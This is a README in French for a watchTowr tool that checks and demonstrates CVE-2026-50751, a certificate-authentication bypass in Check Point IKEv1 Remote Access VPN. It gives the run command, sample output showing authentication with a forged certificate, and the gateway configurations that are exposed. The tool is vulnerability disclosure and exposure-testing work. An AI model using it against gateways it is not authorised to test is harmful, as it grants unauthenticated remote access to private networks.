
Générateur d'artefacts de détection pour le contournement de l'authentification par certificat IKEv1 de Check Point VPN (CVE-2026-50751). Valide l'exposition de la passerelle et démontre un accès distant non authentifié via des certificats forgés.
Un générateur d'artefacts de détection du contournement de l'authentification par certificat IKEv1 du VPN Remote Access Check Point.
https://github.com/user-attachments/assets/1280c545-364e-42d1-94ac-5b2cd850d14e
Voir notre article de blog pour les détails techniques.
$ python3 watchTowr-vs-Check-Point-CVE-2026-50751.py -rh vpn.example.com -u watchtowr
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Check-Point-CVE-2026-50751.py
(*) Check Point IKEv1 Remote-Access VPN certificate-auth bypass Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-50751]
[#] CVE-2026-50751 Check Point IKEv1 Remote-Access certificate-auth bypass
[+] Self-signed cert (untrusted); signature will be invalid (no private key)
[#] Connecting via udp ...
[#] Authenticating as 'watchtowr' with the forged certificate + invalid signature...
[#] Decrypting...
[+] Gateway Internal IP: 172.31.255.128
[+] [BYPASSED] Gateway authenticated us as 'watchtowr'. CVE-2026-50751 certificate-authentication bypass confirmed.
Nécessite Python 3 et le paquet cryptography :
pip install cryptography
Ce générateur d'artefacts de détection watchTowr vérifie et démontre le contournement de l'authentification CVE-2026-50751 (CVSS 9.3, CWE-287) du VPN Remote Access / Mobile Access Check Point. Un attaquant distant non authentifié peut mener à bien l'échange IKEv1 phase 1 obsolète et être authentifié en tant qu'utilisateur Remote Access provisionné sans certificat valide, clé privée ni mot de passe. Il fonctionne à la fois sur IKE (UDP 500/4500) et sur le mode visiteur (Visitor Mode) / SSL de Check Point (TCP brut 443, TCPT).
Une passerelle est exposée lorsqu'elle est configurée pour la voie IKEv1 héritée : clients Remote Access hérités autorisés, IKEv1 autorisé (pas uniquement IKEv2).
Le contournement de l'authentification par certificat s'applique aux méthodes d'authentification utilisateur Certificate, Certificate with enrollment et Mixed ; le Legacy simple (nom d'utilisateur/mot de passe) ne peut pas être contourné.
La remédiation et des détails supplémentaires sont disponibles dans l'avis et le correctif à chaud Check Point sk185033 :
Pour les dernières recherches en sécurité, suivez l'équipe watchTowr Labs.